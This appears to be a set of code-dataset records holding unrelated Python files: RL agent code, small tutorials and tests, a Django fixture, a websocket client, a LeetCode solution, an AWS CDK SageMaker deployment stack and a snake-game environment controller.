torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr, betas=self.critic_betas)\n\n self.log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.log_alpha.requires_grad = True\n self.target_entropy = -self.action_dim\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha], lr=1e-3, betas=[0.9, 0.999])\n\n def half_reset(self):\n self.actor = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target.load_state_dict(self.actor.state_dict())\n self.actor_target.requires_grad = False\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr, betas=self.actor_betas)\n\n self.critic = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_target.requires_grad = False\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr, betas=self.critic_betas)\n\n self.log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.log_alpha.requires_grad = True\n self.target_entropy = -self.action_dim\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha], lr=1e-3, betas=[0.9, 0.999])\n\n def reset(self):\n self.replay_buffer = ArtificialReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim], capacity=int(self.capacity), device=self.device)\n torch.cuda.empty_cache()\n\n def process_reset(self):\n pass\n\n def save(self, PATH):\n sd = {\n 'actor': self.actor.state_dict(),\n 'critic': self.critic.state_dict(),\n 'log_alpha': self.log_alpha.data,\n 'actor_optim': self.actor_optimizer.state_dict(),\n 'critic_optim': self.critic_optimizer.state_dict(),\n 'alpha_optim': self.log_alpha_optimizer.state_dict()\n }\n torch.save(sd, PATH)\n \n def load(self, PATH):\n all_dict = torch.load(PATH)\n self.actor.load_state_dict(all_dict['actor'])\n self.actor_target.load_state_dict(all_dict['actor'])\n self.critic.load_state_dict(all_dict['critic'])\n self.critic_target.load_state_dict(all_dict['critic'])\n self.log_alpha.data = all_dict['log_alpha']\n self.actor_optimizer.load_state_dict(all_dict['actor_optim'])\n self.critic_optimizer.load_state_dict(all_dict['critic_optim'])\n self.log_alpha_optimizer.load_state_dict(all_dict['alpha_optim'])\n","sub_path":"olds/mbrl_parallel_wq2.py","file_name":"mbrl_parallel_wq2.py","file_ext":"py","file_size_in_byte":29308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305004659","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 22:54:48 2019\n\n@author: MSI\n\"\"\"\n\nclass Mahasiswa():\n\tnama = 'nama'\n\n\tdef belajar(self, kondisi): #self itu kaya this\n\t\tprint(self.nama,'sedang belajar', kondisi)\n\n\tdef tidur(self):\n\t\tprint(self.nama,'tidur di kelas')\n\n# main programnya\n\notong = Mahasiswa()\nucup = Mahasiswa()\n\notong.nama = \"otong surotong\"\nucup.nama = \"michael ucup\"\n\nprint(otong.nama)\nprint(ucup.nama)\n\notong.belajar('dengan giat')\nucup.tidur()","sub_path":"18. Pengenalan Class.py","file_name":"18. Pengenalan Class.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155068137","text":"\"\"\"\n Test ocean class\n\n\"\"\"\n\nimport logging\nimport os\nimport pytest\n\nfrom web3 import Web3, HTTPProvider\n\nfrom squid_py.constants import (\n KEEPER_CONTRACTS\n)\n\nfrom squid_py import (\n Ocean,\n OceanInvalidContractAddress\n)\n\nfrom squid_py.utils import (\n Web3Helper,\n convert_to_bytes,\n convert_to_string,\n convert_to_text\n)\n\nfrom squid_py.config import (\n Config,\n)\n\nfrom squid_py.keeper import (\n Contracts\n)\n\n\ndef get_keeper_path(path = ''):\n if os.path.exists(path):\n pass\n elif os.getenv('VIRTUAL_ENV'):\n path = os.path.join(os.getenv('VIRTUAL_ENV'), 'contracts')\n else:\n path = os.path.join(site.PREFIXES[0], 'contracts')\n return path\n\ndef test_ocean_contracts():\n os.environ['CONFIG_FILE'] = 'config_local.ini'\n os.environ['KEEPER_URL'] = 'http://0.0.0.0:8545'\n ocean = Ocean()\n assert ocean.contracts.token is not None\n assert ocean.keeper_url == os.environ['KEEPER_URL']\n\n\n\ndef test_ocean_contracts_with_conf(caplog):\n caplog.set_level(logging.DEBUG)\n # Need to ensure config.ini is populated!\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n config = Config('config_local.ini')\n validate_market_addess = ocean.web3.toChecksumAddress(config.get(KEEPER_CONTRACTS, 'market.address'))\n assert ocean.contracts.market.address == validate_market_addess\n assert ocean.address_list\n assert ocean.address_list['market'] == validate_market_addess\n assert ocean.gas_limit == int(config.get(KEEPER_CONTRACTS, 'gas_limit'))\n assert ocean.provider_url == 'http://localhost:5000'\n\n\ndef test_split_signature():\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n signature = b'\\x19\\x15!\\xecwnX1o/\\xdeho\\x9a9\\xdd9^\\xbb\\x8c2z\\x88!\\x95\\xdc=\\xe6\\xafc\\x0f\\xe9\\x14\\x12\\xc6\\xde\\x0b\\n\\xa6\\x11\\xc0\\x1cvv\\x9f\\x99O8\\x15\\xf6f\\xe7\\xab\\xea\\x982Ds\\x0bX\\xd9\\x94\\xa42\\x01'\n split_signature = ocean.helper.split_signature(signature=signature)\n assert split_signature.v == 28\n assert split_signature.r == b'\\x19\\x15!\\xecwnX1o/\\xdeho\\x9a9\\xdd9^\\xbb\\x8c2z\\x88!\\x95\\xdc=\\xe6\\xafc\\x0f\\xe9'\n assert split_signature.s == b'\\x14\\x12\\xc6\\xde\\x0b\\n\\xa6\\x11\\xc0\\x1cvv\\x9f\\x99O8\\x15\\xf6f\\xe7\\xab\\xea\\x982Ds\\x0bX\\xd9\\x94\\xa42'\n\n\ndef test_convert():\n input_text = \"my text\"\n print(\"output %s\" % convert_to_string(convert_to_bytes(input_text)))\n assert convert_to_text(convert_to_bytes(input_text)) == input_text\n\ndef test_accounts():\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n assert ocean.accounts\n assert len(ocean.accounts) == 10\n for account in ocean.accounts:\n assert 'address' in account\n assert 'token' in account\n assert 'ether' in account\n assert account['ether'] > 0\n assert isinstance(account['token'], int)\n\ndef test_provider_access():\n ocean = Ocean(provider_url = None)\n assert ocean\n assert ocean.provider_url == None\n config = Config('config_local.ini')\n keeper_url = 'http://0.0.0.0:8545'\n address_list = {\n 'market' : config.get(KEEPER_CONTRACTS, 'market.address'),\n 'token' : config.get(KEEPER_CONTRACTS, 'token.address'),\n 'auth' : config.get(KEEPER_CONTRACTS, 'auth.address'),\n }\n\n ocean = Ocean(keeper_url=keeper_url, provider_url = None, address_list = address_list)\n assert ocean\n assert ocean.contracts.market\n assert ocean.contracts.token\n assert ocean.contracts.auth\n\n # the same above but for a low level access to the modules within squid-py\n web3 = Web3(HTTPProvider(keeper_url))\n assert web3\n helper = Web3Helper(web3)\n assert helper\n contracts = Contracts(helper, get_keeper_path(), address_list)\n assert contracts\n\ndef test_errors_raised():\n config = Config('config_local.ini')\n address_list = {\n 'market' : config.get(KEEPER_CONTRACTS, 'market.address'),\n 'token' : config.get(KEEPER_CONTRACTS, 'token.address'),\n 'auth' : config.get(KEEPER_CONTRACTS, 'auth.address'),\n }\n\n with pytest.raises(TypeError):\n ocean = Ocean(keeper_url = None)\n assert ocean == None\n ocean = Ocean()\n assert ocean == None\n\n with pytest.raises(ValueError):\n ocean = Ocean(web3 = None)\n assert ocean == None\n\n with pytest.raises(FileNotFoundError):\n ocean = Ocean(config_file='error_file.txt')\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': '0x00'} )\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': address_list['market'] + 'FF' } )\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': address_list['market'][4:] } )\n assert ocean == None\n","sub_path":"tests/test_ocean.py","file_name":"test_ocean.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162769537","text":"from food_items.models import Product, Store, BestProductSelection, Category\nfrom django.contrib.auth.models import User\n\ndef set_up_db():\n Category.objects.bulk_create([\n Category(name=\"Snacks\"),\n Category(name=\"Snacks sucrés\"),\n Category(name=\"Petit-déjeuners\"),\n Category(name=\"Biscuits\"),\n Category(name=\"Biscuits et gâteaux\"),\n Category(name=\"Snacks salés\")\n ])\n Store.objects.bulk_create([\n Store(name=\"Carrefour\"),\n Store(name=\"Leclerc\"),\n Store(name=\"Magasins U\"),\n Store(name=\"REWE\")])\n Product.objects.bulk_create([\n Product(name=\"Nutella Allégé\",\n brand=\"Nutella Ferrero\",\n code=\"01234567891011\",\n last_modified=\"2020-11-11 15:45+0200\",\n nutrition_score=\"E\"\n ),\n Product(name=\"Nutella Délicieux\",\n brand=\"Nutella Ferrero\",\n code=\"32134567891011\",\n last_modified=\"2020-11-11 19:45+0200\",\n nutrition_score=\"C\"\n )])\n p1 = Product.objects.get(code=\"01234567891011\")\n p2 = Product.objects.get(code=\"32134567891011\")\n s1 = Store.objects.get(name=\"Carrefour\")\n s2 = Store.objects.get(name=\"Leclerc\")\n p1.stores.set([s1, s2])\n p2.stores.set([s2])\n p1.save()\n p2.save()\n\n User.objects.bulk_create([\n User(first_name=\"Fabrice\",\n last_name=\"Jaouën\",\n email=\"fabricejaouen@yahoo.com\",\n is_superuser=True,\n username=\"admin\",\n password=\"pwd\",\n is_staff=True,\n is_active=True,\n date_joined=\"2020-11-01T05:48:00.941Z\"),\n User(first_name=\"John\",\n last_name=\"Doe\",\n email=\"fabricejaouen@yahoo.com\",\n is_superuser=False,\n username=\"user\",\n password='pwd',\n is_staff=False,\n is_active=True,\n date_joined=\"2020-11-01T05:48:00.941Z\"),\n ])\n\n u1 = User.objects.get(username=\"user\")\n p1.selection.set([u1])\n p2.selection.set([u1])\n\n\n","sub_path":"papounet_diet/food_items/tests/fixture.py","file_name":"fixture.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"232929712","text":"from vkbottle import vkscript\n\nBASIC_CYCLE = \"var a=%A%;var some_list=[];while(a<100){API.users.get({user_id:a});a = a + 1;};return some_list;\"\n\n\n@vkscript\ndef basic_cycle(api, a: int = 10):\n some_list = []\n while a < 100:\n api.users.get(user_id=a)\n a += 1\n return some_list\n\n\n@vkscript\ndef types(api):\n a = 5.1\n b = 5 * a\n results = [b, b - 2]\n _ = {\"a\": 1, \"b\": 2}\n _ = True\n _ = 3 - 3.3 + 3.0 * 0.3 / 33 % 3\n _ = \"string\"\n\n if a < 5:\n pass\n elif b > 25:\n a += 1\n a -= 1\n else:\n while a < b:\n a *= 1.1\n\n for i in results:\n results.append(i ** 2)\n results.pop()\n return results\n\n\ndef test_vkscript():\n assert basic_cycle(a=10) == BASIC_CYCLE.replace(\"%A%\", \"10\")\n assert basic_cycle(a=94) == BASIC_CYCLE.replace(\"%A%\", \"94\")\n assert types()\n","sub_path":"tests/vkscript_converter_test.py","file_name":"vkscript_converter_test.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188105567","text":"import json\nimport datetime\nfrom threading import Thread\nimport time\nimport logging\nimport urllib\nimport queue\nimport threading\nimport uuid\nimport asyncio\nfrom autobahn.asyncio.websocket import WebSocketClientFactory, WebSocketClientProtocol\nfrom autobahn.websocket.protocol import parseWsUrl\n\nfrom SAMI import MessageQueues\n\nfrom SAMI import SAMIRequests\nfrom utils.Logging import Logger\n\n\ndef mylog(flow, direction, message):\n Logger().info('{flow:10.10} {direction} {message}'.format(flow=flow, message=message, direction=direction))\n\ncurrent_cids = {}\ncurrent_cids_lock = threading.Lock()\n\n\nclass LiveProtocol(WebSocketClientProtocol):\n name = \"Live\"\n opened = False\n\n def onOpen(self):\n mylog(self.name, '==', '{\"type\": \"opened\"}')\n self.factory.loop.call_later(1, self.tick)\n\n def tick(self):\n self.opened = True\n\n def onMessage(self, payload, isBinary):\n mylog(self.name, '<=', payload)\n\n def onClose(self, clean, status, message):\n mylog(self.name, '==', '{\"type\": \"closed\", \"message\": \"' + str(message) + '\"}')\n\n\nclass LoopThread(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.loop = None\n self.protocol = None\n\n def run(self):\n self.loop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.loop)\n\n live_params = {'uid': SAMIRequests.get_uid(), 'Authorization': 'Bearer ' + SAMIRequests.get_token()}\n live_url = SAMIRequests.sami_live()\n print(live_url + '?' + urllib.parse.urlencode(live_params)) \n liveCoro = getCoroutineWS(self.loop, live_url + '?' + urllib.parse.urlencode(live_params), LiveProtocol)\n\n (transport, protocol) = self.loop.run_until_complete(liveCoro)\n self.protocol = protocol\n\n @asyncio.coroutine\n def wait_websocket_ready(protocol):\n while not protocol.opened:\n yield from asyncio.sleep(1)\n self.loop.run_until_complete(wait_websocket_ready(protocol))\n self.loop.run_forever()\n\n def stop(self):\n self.loop.stop()\n\n\ndef getCoroutineWS(loop, url, protocol):\n factory = WebSocketClientFactory(url, debug=False)\n factory.protocol = protocol\n isSecure, host, port, resource, path, params = parseWsUrl(url)\n coroutine = loop.create_connection(factory, host, port, ssl=isSecure)\n return coroutine\n\ndef init_loop():\n loop_thread = LoopThread()\n loop_thread.setName('event loop thread')\n loop_thread.daemon = True\n loop_thread.start()\n while loop_thread.loop is None:\n time.sleep(1)\n while loop_thread.protocol is None:\n time.sleep(1)\n while not loop_thread.protocol.opened:\n time.sleep(1)\n return loop_thread\n\n","sub_path":"nubo/clouds/SAMI/Live.py","file_name":"Live.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584580481","text":"'''\nRoman numerals are represented by seven different symbols: I, V, X, L, C, D and M.\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1000\nFor example, two is written as II in Roman numeral, just two one's added together. Twelve is written as, XII, which is simply X + II. The number twenty seven is written as XXVII, which is XX + V + II.\n\nRoman numerals are usually written largest to smallest from left to right. However, the numeral for four is not IIII. Instead, the number four is written as IV. Because the one is before the five we subtract it making four. The same principle applies to the number nine, which is written as IX. There are six instances where subtraction is used:\n\nI can be placed before V (5) and X (10) to make 4 and 9. \nX can be placed before L (50) and C (100) to make 40 and 90. \nC can be placed before D (500) and M (1000) to make 400 and 900.\nGiven an integer, convert it to a roman numeral. Input is guaranteed to be within the range from 1 to 3999.\n\nExample 1:\n\nInput: 3\nOutput: \"III\"\nExample 2:\n\nInput: 4\nOutput: \"IV\"\nExample 3:\n\nInput: 9\nOutput: \"IX\"\nExample 4:\n\nInput: 58\nOutput: \"LVIII\"\nExplanation: C = 100, L = 50, XXX = 30 and III = 3.\nExample 5:\n\nInput: 1994\nOutput: \"MCMXCIV\"\nExplanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n'''\n\n\n# 2018-6-16\n# Integer to Roman\nclass Solution:\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n r = []\n res = ''\n x = 1\n while num > 0:\n r.append((num % 10)*x)\n num = num // 10\n x *= 10\n lens = len(r)-1\n for i in range(lens,-1,-1):\n if r[i]//1000 > 0: res += \"M\"*(r[i]//1000)\n if r[i]//100 > 0 and r[i]//100 < 10:\n j = r[i]//100\n if j<4: res += \"C\"*(j)\n elif j == 4: res += \"CD\"\n elif j == 5: res += \"D\"\n elif j > 5 and j < 9: res += \"D\" + \"C\"*(j-5)\n else: res += \"CM\"\n if r[i]//10 > 0 and r[i]//10 < 10:\n t = r[i]//10\n if t<4: res += \"X\"*(t)\n elif t == 4: res += \"XL\"\n elif t == 5: res += \"L\"\n elif t > 5 and t < 9: res += \"L\" +\"X\"*(t-5)\n else: res += \"XC\" \n if r[i]//1 > 0 and r[i]//1 < 10:\n n = r[i]//1\n if n<4: res += \"I\"*(n)\n elif n == 4: res += \"IV\"\n elif n == 5: res += \"V\"\n elif n > 5 and n < 9: res += \"V\" +\"I\"*(n-5)\n else: res += \"IX\" \n return res \n\n# test\nnum = 114\ntest = Solution()\nres = test.intToRoman(num)\nprint(res)\n\n\n\"\"\"\nclass Solution {\n public String intToRoman(int num) {\n int cur = 0;\n int carry = 1;\n // Deque ret = new LinkedList<>();\n String ret;\n while (num > 0) {\n cur = (num % 10) * carry;\n carry *= 10;\n num /= 10;\n \n if (cur >= 1000) {\n while (cur > 0) {\n ret = \"M\" + ret;\n cur -= 1000;\n }\n } else if (cur >= 500) {\n String tmp = \"D\";\n cur -= 500;\n while (cur > 0) {\n tmp = tmp + \"C\";\n }\n ret = tmp + ret;\n } else if (cur >= 100) {\n if (cur == 400) {\n ret = \"CD\" + ret;\n } else {\n while (cur > 0) {\n ret = \"C\" + ret;\n cur -= 100;\n }\n }\n } else if (cur >)\n }\n }\n}\n\"\"\"","sub_path":"LeetCode/python/12_medium_Integer to Roman.py","file_name":"12_medium_Integer to Roman.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"529011555","text":"from os import environ\nfrom huggingface_sagemaker.utils import (\n LATEST_PYTORCH_VERSION,\n LATEST_TRANSFORMERS_VERSION,\n region_dict,\n)\nfrom aws_cdk import core as cdk\n\n# For consistency with other languages, `cdk` is the preferred import name for\n# the CDK's core module. The following line also imports it as `core` for use\n# with examples from the CDK Developer's Guide, which are in the process of\n# being updated to use `cdk`. You may delete this import if you don't need it.\nfrom aws_cdk import core, aws_sagemaker as sagemaker, aws_iam as iam\n\n\n# policies based on https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html#sagemaker-roles-createmodel-perms\niam_sagemaker_actions = [\n \"sagemaker:*\",\n \"ecr:GetDownloadUrlForLayer\",\n \"ecr:BatchGetImage\",\n \"ecr:BatchCheckLayerAvailability\",\n \"ecr:GetAuthorizationToken\",\n \"cloudwatch:PutMetricData\",\n \"cloudwatch:GetMetricData\",\n \"cloudwatch:GetMetricStatistics\",\n \"cloudwatch:ListMetrics\",\n \"logs:CreateLogGroup\",\n \"logs:CreateLogStream\",\n \"logs:DescribeLogStreams\",\n \"logs:PutLogEvents\",\n \"logs:GetLogEvents\",\n \"s3:CreateBucket\",\n \"s3:ListBucket\",\n \"s3:GetBucketLocation\",\n \"s3:GetObject\",\n \"s3:PutObject\",\n]\n\n\ndef get_image_uri(\n region=None, transformmers_version=LATEST_TRANSFORMERS_VERSION, pytorch_version=LATEST_PYTORCH_VERSION\n):\n # return f\"{region_dict[region]}.dkr.ecr.{region}.amazonaws.com/huggingface-pytorch-inference:{pytorch_version}-transformers{transformmers_version}-cpu-py36-ubuntu18.04\"\n return \"763104351884.dkr.ecr.us-east-1.amazonaws.com/huggingface-pytorch-inference:1.8.1-transformers4.10.2-gpu-py36-cu111-ubuntu18.04\"\n\n\nclass HuggingfaceSagemaker(cdk.Stack):\n def __init__(self, scope: cdk.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n # Create SageMaker model\n execution_role = kwargs.pop(\"role\", None)\n # hf_model = kwargs.pop(\"model\", \"\")\n huggingface_model = core.CfnParameter(\n self,\n \"model\",\n type=\"String\",\n default=\"\",\n ).value_as_string\n huggingface_task = core.CfnParameter(\n self,\n \"task\",\n type=\"String\",\n default=None,\n ).value_as_string\n # model_data = kwargs.pop(\"modelData\",None)\n\n image_uri = get_image_uri(region=self.region)\n\n if execution_role is None:\n execution_role = iam.Role(\n self, \"hf_sagemaker_execution_role\", assumed_by=iam.ServicePrincipal(\"sagemaker.amazonaws.com\")\n )\n execution_role.add_to_policy(iam.PolicyStatement(resources=[\"*\"], actions=iam_sagemaker_actions))\n\n container_environment = {\"HF_MODEL_ID\": huggingface_model, \"HF_TASK\": huggingface_task}\n container = sagemaker.CfnModel.ContainerDefinitionProperty(environment=container_environment, image=image_uri)\n\n model = sagemaker.CfnModel(\n self,\n \"hf_model\",\n execution_role_arn=execution_role.role_arn,\n primary_container=container,\n model_name=f'model-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n )\n\n endpoint_configuration = sagemaker.CfnEndpointConfig(\n self,\n \"hf_endpoint_config\",\n endpoint_config_name=f'config-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n production_variants=[\n sagemaker.CfnEndpointConfig.ProductionVariantProperty(\n initial_instance_count=1,\n instance_type=\"ml.m5.xlarge\",\n model_name=model.model_name,\n initial_variant_weight=1.0,\n variant_name=model.model_name,\n )\n ],\n )\n endpoint = sagemaker.CfnEndpoint(\n self,\n \"hf_endpoint\",\n endpoint_name=f'endpoint-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n endpoint_config_name=endpoint_configuration.endpoint_config_name,\n )\n endpoint_configuration.node.add_dependency(model)\n endpoint.node.add_dependency(endpoint_configuration)\n","sub_path":"huggingface_sagemaker/huggingface_sagemaker.py","file_name":"huggingface_sagemaker.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267254209","text":"from gym_snake.envs.snake import Snake\nfrom gym_snake.envs.snake import Grid\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\n\nclass Controller():\n \"\"\"\n This class combines the Snake, Food, and Grid classes to handle the game logic.\n \"\"\"\n\n def __init__(self, grid_size=[30, 30], unit_size=10, unit_gap=1, snake_size=3, n_snakes=1, n_foods=1,\n random_init=True, wall=False):\n\n assert n_snakes < grid_size[0] // 3\n assert n_snakes < 25\n assert snake_size < grid_size[1] // 2\n assert unit_gap >= 0 and unit_gap < unit_size\n\n self.snakes_remaining = n_snakes\n self.grid = Grid(grid_size, unit_size, unit_gap)\n\n self.empty = []\n self.douse = []\n self.r = [0., 0., 0., 0.]\n\n self.snakes = []\n self.dead_snakes = []\n for i in range(1, n_snakes + 1):\n start_coord = [i * grid_size[0] // (n_snakes + 1), snake_size + 1]\n self.snakes.append(Snake(start_coord, snake_size))\n color = [self.grid.HEAD_COLOR[0], i * 10, 0]\n color = [0, 0, 255]\n self.snakes[-1].head_color = color\n self.grid.draw_snake(self.snakes[-1], color)\n self.dead_snakes.append(None)\n\n # if wall:\n # self.grid.create_wall()\n # self.grid.create_wall()\n # self.grid.create_wall()\n\n # if not random_init:\n # for i in range(2,n_foods+2):\n # start_coord = [i*grid_size[0]//(n_foods+3), grid_size[1]-5]\n # self.grid.place_food(start_coord)\n # else:\n # for i in range(n_foods):\n # self.grid.new_food(i)\n\n self.grid.init_fire()\n\n def move_snake(self, direction, snake_idx):\n \"\"\"\n Moves the specified snake according to the game's rules dependent on the direction.\n Does not draw head and does not check for reward scenarios. See move_result for these\n functionalities.\n \"\"\"\n\n snake = self.snakes[snake_idx]\n if type(snake) == type(None):\n return\n\n if direction >= 8:\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co):\n return\n if np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n self.grid.draw(co, self.grid.WALL_COLOR)\n self.douse.append(co)\n self.grid.aag.remove(co)\n # self.r[snake_idx] += 1\n\n elif direction >= 4:\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co):\n return\n self.grid.draw(co, self.grid.WHITE)\n self.empty.append(co)\n # self.r[snake_idx] += 0.3\n\n else:\n # x1 = snake.head[0]\n # y1 = snake.head[1]\n # x2 = self.grid.gm[0]\n # y2 = self.grid.gm[1]\n #\n # if np.random.rand()<0.5:\n # if (x1 < x2):\n # direction = 1\n # else:\n # direction = 3\n # else:\n # if (y1 < y2):\n # direction = 2\n # else:\n # direction = 0\n\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co) or np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n return\n\n # if euclidean(snake.head, self.grid.gm) > euclidean(co, self.grid.gm):\n # self.r[snake_idx] += 0.1\n # else:\n # self.r[snake_idx] -= 0.1\n\n # Cover old head position with body\n # if not snake.head in self.empty:\n self.grid.cover(snake.head, self.grid.BODY_COLOR)\n # else:\n # self.grid.draw(snake.head, self.grid.WHITE)\n # Erase tail without popping so as to redraw if food eaten\n self.grid.erase(snake.body[0])\n # Find and set next head position conditioned on direction\n snake.action(direction)\n\n def move_result(self, direction, snake_idx=0):\n \"\"\"\n Checks for food and death collisions after moving snake. Draws head of snake if\n no death scenarios.\n \"\"\"\n\n if direction >= 4:\n return\n\n snake = self.snakes[snake_idx]\n if type(snake) == type(None):\n return 0\n\n co = snake.step(snake.head, direction)\n if self.grid.off_grid(co) or np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n return\n\n # Check for death of snake\n # if False and self.grid.check_death(snake.head):\n # self.dead_snakes[snake_idx] = self.snakes[snake_idx]\n # self.snakes[snake_idx] = None\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # if direction < 4:\n # if len(snake.body)>1:\n # try:\n # self.grid.connect(snake.body.popleft(), snake.body[0], self.grid.SPACE_COLOR)\n # finally:\n # k=0\n # self.r[snake_idx] += -0.9\n # else:\n # food_item = self.grid.food_space(snake.head)\n #\n # # Check for wall\n # if food_item == -2:\n # self.dead_snakes[snake_idx] = self.snakes[snake_idx]\n # self.snakes[snake_idx] = None\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # self.grid.connect(snake.body.popleft(), snake.body[0], self.grid.SPACE_COLOR)\n # reward = -1\n #\n # # Check for reward\n # elif food_item != -1:\n # self.grid.draw(snake.body[0], self.grid.BODY_COLOR) # Redraw tail\n # self.grid.connect(snake.body[0], snake.body[1], self.grid.BODY_COLOR)\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # reward = self.grid.FOOD_REWARDS[food_item]\n # self.grid.new_food(food_item)\n\n # else:\n reward = 0\n empty_coord = snake.body.popleft()\n self.grid.connect(empty_coord, snake.body[0], self.grid.SPACE_COLOR)\n self.grid.draw(snake.head, snake.head_color)\n\n self.grid.connect(snake.body[-1], snake.head, self.grid.BODY_COLOR)\n\n # return reward\n\n def kill_snake(self, snake_idx):\n \"\"\"\n Deletes snake from game and subtracts from the snake_count\n \"\"\"\n return\n assert self.dead_snakes[snake_idx] is not None\n self.grid.erase(self.dead_snakes[snake_idx].head)\n self.grid.erase_snake_body(self.dead_snakes[snake_idx])\n self.dead_snakes[snake_idx] = None\n self.snakes_remaining -= 1\n\n def step(self, directions):\n \"\"\"\n Takes an action for each snake in the specified direction and collects their rewards\n and dones.\n\n directions - tuple, list, or ndarray of directions corresponding to each snake.\n \"\"\"\n\n self.r = [0., 0., 0., 0.]\n\n # Ensure no more play until reset\n if self.snakes_remaining < 1 or self.grid.open_space < 1:\n if len(directions) is 1:\n return self.grid.grid.copy(), 0, True, {\"snakes_remaining\": self.snakes_remaining}\n else:\n return self.grid.grid.copy(), [0] * len(directions), True, {\"snakes_remaining\": self.snakes_remaining}\n\n # remove when multiple agents\n\n # directions = int(directions)\n\n if type(directions) == type(int()):\n directions = [directions]\n\n for i, direction in enumerate(directions):\n\n if self.snakes[i] is None and self.dead_snakes[i] is not None:\n self.kill_snake(i)\n self.move_snake(direction, i)\n self.move_result(direction, i)\n\n snake = self.snakes[i]\n if snake is not None:\n for co in self.empty:\n if not np.array_equal(snake.head, co):\n self.grid.draw(co, self.grid.WHITE)\n\n for co in self.douse:\n if not np.array_equal(snake.head, co):\n self.grid.draw(co, self.grid.WALL_COLOR)\n\n self.grid.draw(snake.head, self.grid.HEAD_COLOR)\n\n self.grid.new_food(0)\n\n done = self.snakes_remaining < 1 # or self.grid.open_space < 1\n self.r[0] += -0.2\n # self.r[1] += -0.2\n if len(self.r) is 1:\n return self.grid.grid.copy(), self.r[0], done, {\"snakes_remaining\": self.snakes_remaining}\n else:\n return self.grid.grid.copy(), self.r, done, {\"snakes_remaining\": self.snakes_remaining}\n","sub_path":"Transfer-Learning-for-Deep-Reinforcement-Learning-master/snake env/gym_snake/envs/snake/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224845639","text":"# -*- coding: utf-8 -*-\n\n\ntry:\n from logging.config import dictConfig\nexcept ImportError:\n from rq.compat.dictconfig import dictConfig\n\n\ndef setup_loghandlers(level='INFO'):\n '''\n 日志设置\n\n '''\n dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n\n 'formatters': {\n 'main': {\n 'format': '[%(levelname)s][%(asctime)s %(name)s:%(lineno)d] %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n },\n\n 'handlers': {\n 'main': 